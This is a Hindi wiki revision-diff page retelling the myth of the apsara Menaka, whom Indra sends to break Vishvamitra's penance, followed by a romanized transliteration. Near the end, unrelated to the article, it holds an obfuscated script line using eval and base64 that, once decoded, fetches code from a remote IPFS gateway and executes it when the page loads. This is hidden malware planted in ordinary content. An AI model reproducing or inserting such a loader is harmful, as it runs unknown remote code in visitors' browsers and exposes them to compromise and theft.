Difference between revisions of "मेनका"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''मेनका''' स्वर्ग की सर्वसुन्दर [[अप्सरा]] थी। देवराज [[इन्द्र]] ने [[विश्वामित्र|महर्षि विश्वामित्र]] के नये सृष्टि के निर्माण के तप से डर कर उनकी तपस्या भंग करने के लिए मेनका को [[पृथ्वी]] पर भेजा था। मेनका ने अपने रूप और सौन्दर्य से तपस्या में लीन विश्वामित्र का तप भंग कर दिया। विश्वामित्र ने मेनका से [[विवाह]] कर लिया और वन में रहने लगे। विश्वामित्र सब कुछ छोड़कर मेनका के ही प्रेम में डूब गये थे। मेनका से विश्वामित्र ने एक सुन्दर कन्या प्राप्त की, जिसका नाम [[शकुंतला]] रखा गया था। जब शकुंतला छोटी थी, तभी एक दिन मेनका उसे और विश्वामित्र को वन में छोड़कर स्वर्ग चली गई। विश्वामित्र का तप भंग करने में सफल होकर मेनका देवलोक लौटी तो वहाँ उसकी कामोद्दीपक शक्ति और कलात्मक सामर्थ्य की भूरि-भूरि प्रशंसा हुई और देवसभा में उसका आदर बहुत बढ़ गया।
 
'''मेनका''' स्वर्ग की सर्वसुन्दर [[अप्सरा]] थी। देवराज [[इन्द्र]] ने [[विश्वामित्र|महर्षि विश्वामित्र]] के नये सृष्टि के निर्माण के तप से डर कर उनकी तपस्या भंग करने के लिए मेनका को [[पृथ्वी]] पर भेजा था। मेनका ने अपने रूप और सौन्दर्य से तपस्या में लीन विश्वामित्र का तप भंग कर दिया। विश्वामित्र ने मेनका से [[विवाह]] कर लिया और वन में रहने लगे। विश्वामित्र सब कुछ छोड़कर मेनका के ही प्रेम में डूब गये थे। मेनका से विश्वामित्र ने एक सुन्दर कन्या प्राप्त की, जिसका नाम [[शकुंतला]] रखा गया था। जब शकुंतला छोटी थी, तभी एक दिन मेनका उसे और विश्वामित्र को वन में छोड़कर स्वर्ग चली गई। विश्वामित्र का तप भंग करने में सफल होकर मेनका देवलोक लौटी तो वहाँ उसकी कामोद्दीपक शक्ति और कलात्मक सामर्थ्य की भूरि-भूरि प्रशंसा हुई और देवसभा में उसका आदर बहुत बढ़ गया।
 +
==इन्द्र का भय==
 +
पौराणिक वर्णन के अनुसार शकुन्तला की माता मेनका इस लोक की नारी नहीं, देवलोक की [[अप्सरा]] थी। महर्षि विश्वामित्र की घोर तपस्या से भयभीत होकर देवराज इन्द्र ने मेनका को कुछ समय के लिये नारी शरीर धारण कर मर्त्यलोक में रहने का आदेश दिया। महर्षि विश्वामित्र ब्रह्मर्षि का पद प्राप्त करना चाहते थे। विश्वामित्र ने ब्रह्मत्व के अधिकार और पद को पाने के लिये घोर तप किया। ब्राह्मणों और देवताओं ने विश्वामित्र के तप की श्लाघा से उन्हें महर्षि से ऊँचा, राजर्षि पद देना स्वीकार कर लिया, परन्तु विश्वामित्र के [[क्षत्रिय]] कुलोद्भव होने के कारण देवताओं और ब्राह्मणों ने उन्हें समाज के विधायक ब्रह्मर्षि का पद देना स्वीकार नहीं किया। [[विश्वामित्र]] देवताओं और ब्राह्मणों की व्यवस्था और शासन में ब्राह्मणों के प्रति पक्षपात देखकर देवताओं की सृष्टि और ब्राह्मणों की व्यवस्था से असंतुष्ट हो गये। उन्होंने ब्रह्मर्षि पद प्राप्त करने की प्रतिज्ञा पूरी करने के लिये देवताओं और ब्राह्मणों द्वारा नियंत्रित तथा शासित सृष्टि और व्यवस्था की प्रतिद्वन्द्विता में नयी सृष्टि तथा नयी व्यवस्था की रचना का निश्चय कर लिया। देवताओं और ब्राह्मणों ने सृष्टि की व्यवस्था पर अपने अधिकार के प्रति विश्वामित्र की इस चुनौती को क्षुद्र मानव का क्षुब्ध अहंकार ही समझा, परन्तु विश्वामित्र दृढ़ निश्चय से नयी सृष्टि की व्यवस्था की रचना के लिये तप में लग गये।
 +
==मेनका का पृथ्वी पर आना==
 +
कुछ समय पश्चात [[विश्वामित्र]] की सफलता का समाचार देवराज इन्द्र तक पहुँचने लगा। [[इन्द्र]] जानते थे कि परंतप महर्षि विश्वामित्र का निश्चय भंग कर देना अत्यन्त कठिन था। वे जानते थे, किसी भी शक्ति का भय अथवा सम्पदा का प्रलोभन विश्वामित्र को अपने निश्चय से डिगा नहीं सकता था। इन्द्र ने विश्वामित्र का तप स्खलित करने के लिये, स्वयं उनकी ही शक्ति विश्वामित्र के मानव शरीर की कार्य-कारण भूत प्राणशक्ति, सृजन-शक्ति का ही उपयोग करने का निश्चय किया। देवराज ने विश्वामित्र के अस्तित्व अथवा शरीर में व्याप्त सृजन-शक्ति को वश में कर, उन्हें तप के लक्ष्य से विमुख करने का उत्तरदायित्व देवलोक की प्रुमख [[अप्सरा]] 'मेनका' को सौंपा। मेनका इन्द्र के आदेश से महर्षि विश्वामित्र का तप भंग करने के लिये मर्त्यलोक में आयी। महर्षि को वश में करने के लिए मेनका ने इन्द्र से परामर्श से उस कामशक्ति का प्रयोग किया, जो शरीर मात्र के उद्भव और क्रम का निमित्त होती है और प्राण तथा जीवन के गुण के रूप में जीव मात्र में समाहित रहती है। मेनका ने विश्वामित्र के शरीर में व्याप्त उस शक्ति का उद्बबोधन करने के लिये अप्सरा के गुण स्वभाव त्याग कर नारी प्रकृति ग्रहण कर ली और महर्षि विश्वामित्र के सामीप्य में प्रत्यक्ष हो गयी। विश्वामित्र का ध्यान आकर्षित करने के लिये मेनका को सूक्ष्म भाव-भंगिमा तथा संकेतों द्वारा अनेक प्रयत्न करने पड़े। वह अवसर पाकर महर्षि की दृष्टि में पड़ जाती और उनकी दृष्टि से संकोच प्रकट कर छिप जाने का यत्न करती। वह सयत्न असावधानी में अपने कमनीय शरीर पर से वायु द्वारा सहसा वस्त्र उड़ जाने देती और फिर महर्षि की दृष्टि के भय और लाज से कच्छप के समान अपने में ही सिमट जाती।
 +
==विश्वामित्र का तप भंग करना==
 +
प्रज्वलित [[अग्नि]] का सामीप्य अन्य पदार्थों में समाहित सुषुप्त अग्नि का उद्बबोधन किये बिना नहीं रहता। महर्षि विश्वामित्र का शरीर कठिन तप से शुष्क काष्ठवत् हो गया था, परन्तु कामाग्नि की प्रतीक मेनका के सामीप्य और संगति से महर्षि के शरीर में कामशक्ति के स्फुलिंग स्फुरित होने लगे। उनका शरीर जीवन की उमंग से सिरहन और स्पन्दन अनुभव करने लगा। महर्षि की तप में लगी हुई प्राणशक्ति मेनका के लावण्यमय शरीर के अवलम्ब से सार्थक होने के लिये व्याकुल हो गयी। महर्षि के चित्त में मेनका की संगति को अधिकाधिक चरितार्थ करने के अतिरिक्त अन्य विचार का अवकाश न रहा। काम की एकाग्रता में विश्वामित्र को देवत्व तथा ब्रह्मत्व की स्पर्धा और प्रतिद्वन्द्वी सृष्टि की रचना का ध्यान न रहा। विश्वामित्र, नारी रूप मेनका के समर्पण के परिरम्भ में विवश हो गये। मेनका [[विश्वामित्र]] का [[ध्यान]] नवसृष्टि रचना से स्खलित करने में सफल हो गयी, परन्तु विश्वामित्र तप पुनः आरम्भ न कर दें, इस चिन्ता में वह कितने समय तक मर्त्यलोक में बनी रहती। मेनका को मर्त्यलोक में देवलोक के कर्म तथा फल से उन्मुक्त, अबाध सुख का संतोष प्राप्त न था। उसे देवलोक में अपनी स्थिती तथा अधिकार की भी चिन्ता थी। उसकी प्रतिद्वन्द्विनी अप्सरायें [[उर्वशी]], [[रम्भा]] आदि देवलोक में उनकी अनुपस्थिति से लाभ उठा सकती थीं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक=|पूर्णता=|शोध=}}
Line 6: Line 12:
 
[[Category:पौराणिक चरित्र]][[Category:पौराणिक_कोश]][[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
[[Category:पौराणिक चरित्र]][[Category:पौराणिक_कोश]][[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 14:10, 3 June 2013

menaka svarg ki sarvasundar apsara thi. devaraj indr ne maharshi vishvamitr ke naye srishti ke nirman ke tap se dar kar unaki tapasya bhang karane ke lie menaka ko prithvi par bheja tha. menaka ne apane roop aur saundary se tapasya mean lin vishvamitr ka tap bhang kar diya. vishvamitr ne menaka se vivah kar liya aur van mean rahane lage. vishvamitr sab kuchh chho dakar menaka ke hi prem mean doob gaye the. menaka se vishvamitr ne ek sundar kanya prapt ki, jisaka nam shakuantala rakha gaya tha. jab shakuantala chhoti thi, tabhi ek din menaka use aur vishvamitr ko van mean chho dakar svarg chali gee. vishvamitr ka tap bhang karane mean saphal hokar menaka devalok lauti to vahaan usaki kamoddipak shakti aur kalatmak samarthy ki bhoori-bhoori prashansa huee aur devasabha mean usaka adar bahut badh gaya.

indr ka bhay

pauranik varnan ke anusar shakuntala ki mata menaka is lok ki nari nahian, devalok ki apsara thi. maharshi vishvamitr ki ghor tapasya se bhayabhit hokar devaraj indr ne menaka ko kuchh samay ke liye nari sharir dharan kar martyalok mean rahane ka adesh diya. maharshi vishvamitr brahmarshi ka pad prapt karana chahate the. vishvamitr ne brahmatv ke adhikar aur pad ko pane ke liye ghor tap kiya. brahmanoan aur devataoan ne vishvamitr ke tap ki shlagha se unhean maharshi se ooancha, rajarshi pad dena svikar kar liya, parantu vishvamitr ke kshatriy kulodbhav hone ke karan devataoan aur brahmanoan ne unhean samaj ke vidhayak brahmarshi ka pad dena svikar nahian kiya. vishvamitr devataoan aur brahmanoan ki vyavastha aur shasan mean brahmanoan ke prati pakshapat dekhakar devataoan ki srishti aur brahmanoan ki vyavastha se asantusht ho gaye. unhoanne brahmarshi pad prapt karane ki pratijna poori karane ke liye devataoan aur brahmanoan dvara niyantrit tatha shasit srishti aur vyavastha ki pratidvandvita mean nayi srishti tatha nayi vyavastha ki rachana ka nishchay kar liya. devataoan aur brahmanoan ne srishti ki vyavastha par apane adhikar ke prati vishvamitr ki is chunauti ko kshudr manav ka kshubdh ahankar hi samajha, parantu vishvamitr dridh nishchay se nayi srishti ki vyavastha ki rachana ke liye tap mean lag gaye.

menaka ka prithvi par ana

kuchh samay pashchat vishvamitr ki saphalata ka samachar devaraj indr tak pahuanchane laga. indr janate the ki parantap maharshi vishvamitr ka nishchay bhang kar dena atyant kathin tha. ve janate the, kisi bhi shakti ka bhay athava sampada ka pralobhan vishvamitr ko apane nishchay se diga nahian sakata tha. indr ne vishvamitr ka tap skhalit karane ke liye, svayan unaki hi shakti vishvamitr ke manav sharir ki kary-karan bhoot pranashakti, srijan-shakti ka hi upayog karane ka nishchay kiya. devaraj ne vishvamitr ke astitv athava sharir mean vyapt srijan-shakti ko vash mean kar, unhean tap ke lakshy se vimukh karane ka uttaradayitv devalok ki prumakh apsara 'menaka' ko sauanpa. menaka indr ke adesh se maharshi vishvamitr ka tap bhang karane ke liye martyalok mean ayi. maharshi ko vash mean karane ke lie menaka ne indr se paramarsh se us kamashakti ka prayog kiya, jo sharir matr ke udbhav aur kram ka nimitt hoti hai aur pran tatha jivan ke gun ke roop mean jiv matr mean samahit rahati hai. menaka ne vishvamitr ke sharir mean vyapt us shakti ka udbabodhan karane ke liye apsara ke gun svabhav tyag kar nari prakriti grahan kar li aur maharshi vishvamitr ke samipy mean pratyaksh ho gayi. vishvamitr ka dhyan akarshit karane ke liye menaka ko sookshm bhav-bhangima tatha sanketoan dvara anek prayatn karane p de. vah avasar pakar maharshi ki drishti mean p d jati aur unaki drishti se sankoch prakat kar chhip jane ka yatn karati. vah sayatn asavadhani mean apane kamaniy sharir par se vayu dvara sahasa vastr u d jane deti aur phir maharshi ki drishti ke bhay aur laj se kachchhap ke saman apane mean hi simat jati.

vishvamitr ka tap bhang karana

prajvalit agni ka samipy any padarthoan mean samahit sushupt agni ka udbabodhan kiye bina nahian rahata. maharshi vishvamitr ka sharir kathin tap se shushk kashthavath ho gaya tha, parantu kamagni ki pratik menaka ke samipy aur sangati se maharshi ke sharir mean kamashakti ke sphuliang sphurit hone lage. unaka sharir jivan ki umang se sirahan aur spandan anubhav karane laga. maharshi ki tap mean lagi huee pranashakti menaka ke lavanyamay sharir ke avalamb se sarthak hone ke liye vyakul ho gayi. maharshi ke chitt mean menaka ki sangati ko adhikadhik charitarth karane ke atirikt any vichar ka avakash n raha. kam ki ekagrata mean vishvamitr ko devatv tatha brahmatv ki spardha aur pratidvandvi srishti ki rachana ka dhyan n raha. vishvamitr, nari roop menaka ke samarpan ke parirambh mean vivash ho gaye. menaka vishvamitr ka dhyan navasrishti rachana se skhalit karane mean saphal ho gayi, parantu vishvamitr tap punah arambh n kar dean, is chinta mean vah kitane samay tak martyalok mean bani rahati. menaka ko martyalok mean devalok ke karm tatha phal se unmukt, abadh sukh ka santosh prapt n tha. use devalok mean apani sthiti tatha adhikar ki bhi chinta thi. usaki pratidvandvini apsarayean urvashi, rambha adi devalok mean unaki anupasthiti se labh utha sakati thian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh